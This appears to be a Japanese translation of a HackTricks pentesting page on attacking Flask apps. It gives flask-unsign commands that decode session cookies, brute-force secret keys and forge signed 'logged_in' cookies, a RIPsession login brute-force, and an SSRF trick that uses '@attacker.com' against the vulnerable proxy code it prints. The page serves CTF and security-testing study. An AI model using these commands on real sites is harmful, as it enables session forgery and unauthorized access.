Flask

AWSハッキングをゼロからヒーローまで学ぶ htARTE(HackTricks AWS Red Team Expert)

HackTricksをサポートする他の方法:

Trickestを使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築および自動化します。 今すぐアクセスしてください:

おそらく、CTFをプレイしている場合、Flaskアプリケーションは SSTIに関連しているでしょう。

Cookies

デフォルトのクッキーセッション名は**session**です。

デコーダ

オンラインFlaskクッキーのデコーダ:https://www.kirsle.net/wizards/flask-session.cgi

手動

最初のドットまでのクッキーの最初の部分を取得し、Base64でデコードします。

echo "ImhlbGxvIg" | base64 -d

Flask-Unsign

パスワードを使用してクッキーも署名されています

Flask-Unsign

Flaskアプリケーションのセッションクッキーを取得、デコード、ブルートフォース、およびクラフトするためのコマンドラインツール。秘密キーを推測します。

pip3 install flask-unsign

Cookieのデコード

flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'

ブルートフォース

flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval

署名

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'

旧バージョンを使用した署名

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy

RIPsession

flask-unsignで作成されたクッキーを使用してウェブサイトをブルートフォースするためのコマンドラインツール。

ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt

Flaskセッションクッキー内のSQLiとSQLmap

この例 では、既知の秘密を使用してFlask用にsqlmapペイロードに自動的に署名するためにsqlmap evalオプションを使用しています。

Flaskプロキシを使用したSSRF

この解説 では、Flaskが文字「@」で始まるリクエストを許可する方法が説明されています。

GET @/ HTTP/1.1
Host: target.com
Connection: close

次のシナリオにおいてはどちらの方法が適していますか:

from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com/'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content

app.run(host='0.0.0.0', port=8080)
"@attacker.com"のようなものを導入して**SSRF**を引き起こすことができるようになる可能性があります。

<figure><img src="../../.gitbook/assets/image (515).png" alt=""><figcaption></figcaption></figure>

[**Trickest**](https://trickest.com/?utm_source=hacktricks\&utm_medium=text\&utm_campaign=ppc\&utm_term=trickest\&utm_content=flask)を使用して、世界で最も先進的なコミュニティツールによって強化された**ワークフローを簡単に構築**および**自動化**します。\
今すぐアクセスしてください:

<div data-gb-custom-block data-tag="embed" data-url='https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask'></div>

<details>

<summary><strong>**htARTE (HackTricks AWS Red Team Expert)****ゼロからヒーローまでのAWSハッキング**を学びましょう!</summary>

HackTricksをサポートする他の方法:

* **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を入手してください
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけてください
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)を**フォロー**してください。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。

</details>

Last updated